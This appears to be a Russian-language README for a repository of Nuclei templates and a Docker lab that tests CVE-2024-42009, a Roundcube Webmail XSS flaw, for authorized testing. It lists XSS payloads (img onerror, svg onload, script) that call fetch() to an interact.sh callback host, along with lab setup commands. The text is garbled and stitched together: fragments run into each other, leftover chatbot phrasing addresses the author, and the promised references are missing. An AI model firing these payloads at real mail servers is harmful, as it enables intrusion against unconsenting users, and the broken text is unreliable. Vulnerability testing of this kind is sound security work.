
Шаблоны Nuclei и Docker-лаборатория для демонстрации и проверки CVE-2024-42009, отраженного XSS в Roundcube Webmail, с использованием Out-of-Band обнаружения через Interactsh для авторизованного тестирования.
Этот репозиторий содержит Nuclei-шаблон и вспомогательные ресурсы для безопасной демонстрации и проверки CVE-2024-42009, критической уязвимости отраженного XSS в Roundcube Webmail. Ошибка находится в функции message_body() в show.php, где модификации после санитизации приводят к десанитизации и небезопасному рендерингу сконструированного HTML-содержимого письма.
⚠️ Этот PoC предназначен только для образовательного и авторизованного тестирования. Не используйте против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.
message_body() в show.phpЭтот репозиторий использует внеполосное (OOB) обнаружение через Interactsh для подтверждения выполнения JavaScript в контролируемой лаборатории.
<body>, содержащим onanimationstart и маяк на InteractshИспользуйте предоставленный файл Docker Compose, чтобы развернуть локальный экземпляр Roundcube с MailHog (SMTP-приемник) и MariaDB.
git clone https://github.com/Shubhankargupta691/CVE-2024-42009.git
cd CVE-2024-42009
docker compose up -d
http://localhost:8080http://localhost:8025⚠️ Не используйте свою учетную запись Google.
CVE-2024-42009-OOB.yaml – Nuclei-шаблон с Interactsh и внеполосным (OOB) обнаружениемCVE-2024-42009.yaml – Nuclei-шаблон без Interactsh и OOBdocker-compose.yml – Настройка лабораторной среды для Roundcube WebmailImages/ – Скриншоты, показывающие HTTP/DNS-запросы от InteractshЭто видео проходит через всю цепочку эксплойта:
Чтобы ответственно включить эти XSS-нагрузки в ваш README, поместите их в раздел, четко обозначенный для образовательных или тестовых целей. Вот предлагаемая структура:
⚠️ Отказ от ответственности: Эти нагрузки предназначены только для образовательного использования и авторизованного тестирования безопасности. Не развертывайте их на системах без явного разрешения.
<!-- Image tag with onerror -->
<img src="https://interact.sh/xss-test" onerror="fetch('https://interact.sh/hit')">
<!-- Broken image source with onerror -->
<img src="https://raw.githubusercontent.com/shubhankargupta691/cve-2024-42009/main/x" onerror="fetch('https://interact.sh/hit')">
<!-- SVG with onload -->
<svg onload="fetch('https://interact.sh/hit')"></svg>
<!-- Script tag -->
<script>fetch('https://interact.sh/hit')</script>
<!-- JavaScript in iframe src -->
https://interact.sh/hit на свою собственную конечную точку прослушивателя.Обновите Roundcube до:
Идеально — вот чистый и профессиональный раздел Ссылки, который вы можете включить в свой README или отправку по электронной почте для CVE-2024-42009. Он цитирует все перечисленные вами источники, отформатированные для ясности и доверия: